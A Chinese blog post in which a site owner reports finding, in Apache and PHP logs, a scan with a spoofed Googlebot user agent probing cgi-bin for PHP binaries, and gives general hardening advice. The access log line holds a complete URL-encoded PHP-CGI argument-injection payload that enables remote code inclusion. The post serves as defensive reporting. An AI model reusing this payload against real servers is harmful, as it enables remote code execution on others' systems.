今天发现,apache被人漏洞检测了
今天突然查看PHP的访问日志,其中有这样的条目:
★- 58.68.234.233 - - [01/Jan/2014:22:34:36 +0800] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" I-1673 O-377 404 213
"-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"以上是PHP访问日志的内容,该日志是我个人更改过格式的,但还是可以一目了然的。
发现这个来自北京,IP为58.68.234.233的客户端请求了POST,而且后面跟着十分可疑的cgi-bin目录。
于是google,发现国内并没有相关文章介绍这个现象,于是查看了国外的网站。
最后,有论坛说这是有人在检测并试图利用一个网站的漏洞,而其中竟然有个傻X如此说道:
“Keep in mind, it may not be Google. It could be a client spoof. Throw the IP in a browser URL and it's all Chinese.”
真是气煞我也,这傻X,一向文明的我,也终于想骂人了,可看着明晃晃的北京IP,我还能说什么(我查阅的那个论坛帖子,是一台湾IP)?
同时,打开apache的错误日志,发现果然有这样的对应apache错误:
[Wed Jan 01 22:34:34 2014] [error] [client 58.68.234.233] script not found or unable to stat: D:/backup/w/bin/apache/apache2.2.22/cgi-bin/php
[Wed Jan 01 22:34:35 2014] [error] [client 58.68.234.233] script not found or unable to stat: D:/backup/w/bin/apache/apache2.2.22/cgi-bin/php5
[Wed Jan 01 22:34:36 2014] [error] [client 58.68.234.233] script not found or unable to stat: D:/backup/w/bin/apache/apache2.2.22/cgi-bin/php-cgi
[Wed Jan 01 22:34:36 2014] [error] [client 58.68.234.233] script not found or unable to stat: D:/backup/w/bin/apache/apache2.2.22/cgi-bin/php.cgi
[Wed Jan 01 22:34:36 2014] [error] [client 58.68.234.233] script not found or unable to stat: D:/backup/w/bin/apache/apache2.2.22/cgi-bin/php4真是吓死个人哟。
它这是轮流检测我apache安装目录下的cgi-bin中是不是有各种php对应的可执行文件啊。
这是一个apache的漏洞,具体是什么就不太清楚了,不过,这也提醒了我们,使用apache的时候,尽量不要使用默认配置,能改目录的改目录,能换地方的换地方,权限能严格就严格,不然说不定什么时候,就中招了。
另外,也可以使用apache的重写功能,将敏感的目录进行直接屏蔽,也可以防止中招。
幸好我这里并没有使用默认配置,否则就能更多地了解到这个要攻击我服务器的家伙在开启我php程序后,到底下一步要干什么了,据说是要改我的robot.txt?
弄得我真想把这几个执行文件放到那里去,体验一下被攻击的感觉……
有时间和兴趣的同学,可以对此研究一下,交流交流。